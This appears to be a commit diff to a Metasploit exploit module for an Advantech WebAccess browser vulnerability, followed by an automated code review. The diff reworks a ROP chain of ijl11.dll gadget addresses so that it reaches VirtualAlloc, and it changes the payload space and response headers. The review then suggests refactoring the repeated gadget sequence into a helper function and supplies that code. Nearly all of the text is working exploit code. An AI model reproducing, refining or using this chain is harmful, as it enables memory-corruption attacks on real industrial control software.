
Commit 5c6236e

Fix rop chain to allow VirtualAlloc when end of stack is too close
1 parent 64ac1e6 commit 5c6236e

1 file changed

+16
-5
lines changed


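--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -48,7 +48,7 @@ def initialize(info = {})
 },
 'Payload' =>
 {
-'Space' => 4096,
+'Space' => 1024,
 'DisableNops' => true,
 'BadChars' => "\x00\x0a\x0d\x5c",
 # Patch the stack to execute the decoder...
@@ -83,22 +83,22 @@ def on_request_exploit(cli, request, target_info)
 EOS
 
 print_status("Sending #{self.name}")
-send_response_html(cli, content)
+send_response_html(cli, content, {'Pragma' => 'no-cache'})
 end
 
 # Uses gadgets from ijl11.dll 1.1.2.16
 def rop_payload(code)
 xpl = rand_text_alphanumeric(61) # offset
 xpl << [0x60014185].pack("V") # RET
 xpl << rand_text_alphanumeric(8)
-# EDX = flAllocationType (0x1000)
+
+# EBX = dwSize (0x40)
 xpl << [0x60012288].pack("V") # POP ECX # RETN
 xpl << [0xffffffff].pack("V") # ecx value
 xpl << [0x6002157e].pack("V") # POP EAX # RETN
-xpl << [0x9ffdbf89].pack("V") # eax value
+xpl << [0x9ffdafc9].pack("V") # eax value
 xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
 xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
-# EBX = dwSize (0x1000)
 xpl << [0x60018084].pack("V") # POP EBP # RETN
 xpl << rand_text_alphanumeric(4) # padding
 xpl << rand_text_alphanumeric(4) # padding
@@ -108,8 +108,19 @@ def rop_payload(code)
 xpl << [0x60012288].pack("V") # POP ECX # RETN
 xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
 xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
+# EDX = flAllocationType (0x1000)
+xpl << [0x60012288].pack("V") # POP ECX # RETN
+xpl << [0xffffffff].pack("V") # ecx value
+xpl << [0x6002157e].pack("V") # POP EAX # RETN
+xpl << [0x9ffdbf89].pack("V") # eax value
+xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
 # ECX = flProtect (0x40)
 xpl << [0x6002157e].pack("V") # POP EAX # RETN
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
 xpl << [0x60029f6c].pack("V") # .data ijl11.dll
 xpl << [0x60012288].pack("V") # POP ECX # RETN
 xpl << [0xffffffff].pack("V") # ecx value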
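Review bot: The six-dword sequence POP ECX / ecx value / POP EAX / eax value / ADC / MUL now appears twice in rop_payload, once under `# EBX = dwSize (0x40)` in the second hunk and again under `# EDX = flAllocationType (0x1000)` in the third, differing only in the `eax value` dword, so a private helper taking that constant would keep the two copies from drifting when one is retuned. The heading comments are also slightly misleading: MUL leaves the high dword of the product in EDX, so both blocks produce their value in EDX (the exact result also depends on CF being clear at the ADC, which nothing in the hunk documents), and the first value only reaches EBX through the `push edx … push ecx … ret` gadget at new line 110. The four `# padding` dwords added after `POP EAX # RETN` in the third hunk carry no explanation of why they sit between the gadget and its operand; `# skipped by the RETN 0x10 of the MUL gadget above` would make the layout readable. rop_payload continues past the end of the third hunk.
```ruby
# Emit the POP ECX / POP EAX / ADC / MUL sequence that leaves a constant
# in EDX; eax_value is the dword loaded into EAX before the ADC.
def mul_into_edx(eax_value)
  gadgets = ''.dup
  gadgets << [0x60012288].pack("V") # POP ECX # RETN
  gadgets << [0xffffffff].pack("V") # ecx value
  gadgets << [0x6002157e].pack("V") # POP EAX # RETN
  gadgets << [eax_value].pack("V")  # eax value
  gadgets << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
  gadgets << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
  gadgets
end
# … unchanged: rop_payload prologue …
xpl << mul_into_edx(0x9ffdafc9) # EDX = dwSize (0x40), moved to EBX later
# … unchanged: POP EBP, padding, push edx / push ecx gadget …
xpl << mul_into_edx(0x9ffdbf89) # EDX = flAllocationType (0x1000)
```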
